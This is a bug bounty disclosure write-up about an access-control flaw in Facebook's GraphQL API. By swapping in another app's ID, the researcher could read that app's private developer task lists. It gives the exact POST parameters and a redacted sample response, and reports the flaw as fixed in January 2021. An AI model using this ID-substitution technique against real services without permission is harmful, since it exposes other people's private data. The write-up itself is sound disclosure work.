Access developer tasks list of any Facebook Application (Bug Bounty)

This vulnerability could have let a malicious user access developer tasks list of any Facebook Application. Developer tasks are private informations that should be accessed only by the authorized developer of the concerned Facebook application.

While browsing https://developers.facebook.com/apps/ I noticed a GraphQL request that was returning the tasks list of my Facebook application.

By intercepting the request and changing the appId value with the ID of a third party Facebook Application, I was able to access to the tasks list of the targeted app.

Reproduction Steps

1) Send a POST request to https://www.facebook.com/api/graphql/ with required CSRF parameters and the following parameters in the request body:

&variables={“appId”:”X”}&doc_id=265437575802287

Where X is the appId

The GraphQL response will return the developer tasks list of the targeted Facebook application:

{
“data”:{
“app_tasks”:[
{“id”:”REDACTED”,
“app_id”:”X”,
“app_name”:”REDACTED”,
“task_objective”:”REDACTED”,
“deadline”:1606147652,
“completion_time”:1605495171}],
“user_tasks_open_count”:0},
“extensions”:{
“is_final”:true}
}

Timeline

January 6, 2021: Report Sent
January 8, 2021: Acknowledged by Facebook
January 13, 2021: Fixed by Facebook
February 1, 2021: Bounty awarded by Facebook

Twitter: https://twitter.com/amineaboud